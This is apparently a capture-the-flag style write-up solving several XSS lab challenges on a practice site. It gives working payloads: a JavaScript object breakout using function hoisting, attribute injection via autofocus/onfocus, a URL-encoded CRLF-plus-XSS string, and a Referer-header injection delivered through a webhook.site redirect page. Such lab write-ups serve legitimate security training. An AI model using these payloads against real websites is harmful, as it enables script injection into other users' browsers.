Breaking out of js object and adding alert function will not work here beacuse
parent.Arbiter.inform("data", {"id":"});
This particular JS code is making an error at first which will then not allow our alert function to execute.
So now what's the error ?
Arbiter is undefined in code so accessing anything from it will cause error.
In JavaScript, Hoisting refers to the process whereby the interpreter appears to move the declaration of functions, variables or classes to the top of their scope, prior to execution of the code.
Using this concept we can solve this challenge.
// Payload
alert`xss`});function Arbiter(){};//
Our input is being Reflected in input tag which is hidden
//paylaod
hello" autofocus onfocus=alert('xss') type="text
Same as Challenge 1
// Payload
alert`xss`});function Arbiter(){};//
This lab is the combination of CRLF Injection and XSS
Payload
%0AContent-Type%3A%20Sankalpa%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20texml%0A%3Cimg%20src%3Dx%20onerror%3Dalert(%27xss%27)%3E
//payload
https://javascript%27%20autofocus%20onfocus='alert``
This Lab is interesting😉.
We can easily inject
<img src=x onerror=alert('xss')>
in the Referer Header. But the main challenge is how can we send payload in the Referer Header without adding manually?
For this Our domain should be something like this
https://<img src=x onerror=alert('xss')>.com
Which is not possible, But we can definitely do this.
https://sankalpa.info.np/<img src=x onerror=alert('xss')>
I used this webhook.site site to exploit it.
- Create your webhook URL
- Click on the edit icon which is on the top right hand side.
- Change content type to text/html
- Paste below code in the body section and save.
<a id="ss" href="https://secbot-xss-challenges.vercel.app/xss-challenge6.php" >click me</a>
<script>
document.getElementById('ss').click()
</script>
Your Web Hook URL should be like this https://webhook.site/<UUID>/<img src=x onerror=alert('xss')>/
When you visit the webhook URL you will be redirected to https://secbot-xss-challenges.vercel.app/xss-challenge6.php
with an alert pop up.
Thanks For Reading ❤️